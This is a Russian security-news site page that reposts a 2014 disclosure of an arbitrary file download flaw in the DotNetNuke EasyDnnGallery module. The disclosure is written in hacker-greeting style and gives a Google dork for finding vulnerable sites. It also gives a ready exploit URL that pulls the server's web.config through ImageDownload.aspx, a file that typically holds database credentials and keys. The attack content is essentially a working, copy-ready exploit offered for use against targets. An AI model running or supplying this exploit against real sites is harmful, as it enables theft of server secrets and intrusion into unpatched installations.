Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  LE, BF and IAA vulnerabilities in Catapulta I.W. Edition

  CS and XSS vulnerabilities in DZS Video Gallery for WordPress

  [SECURITY] [DSA 2929-1] ruby-actionpack-3.2 security update

  [REVIVE-SA-2014-001] Revive Adserver 3.0.5 fixes CSRF vulnerability

From:cseye_ut_(at)_yahoo.com <cseye_ut_(at)_yahoo.com>
Date:14 июня 2014 г.
Subject:DNN (DotNetNuke®) EasyDnnGallery Module Arbitrary File Download Vulnerability



#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : DNN (DotNetNuke®) EasyDnnGallery Module Arbitrary File Download Vulnerability
# Author : alieye
# vendor : http://www.easydnnsolutions.com/ , http://store.dnnsoftware.com/
# Contact : [email protected]
# Risk : High
# Class: Remote
# Google Dork: inurl:/EasyDnnGallery/
# Version: all version
# Date: 09/06/2014
# os : windows server 2008
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++



You can download any file from your target


Exploit : http://victim.com/DesktopModules/EasyDnnGallery/ImageDownload.aspx?file=~/web.con
fig


#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород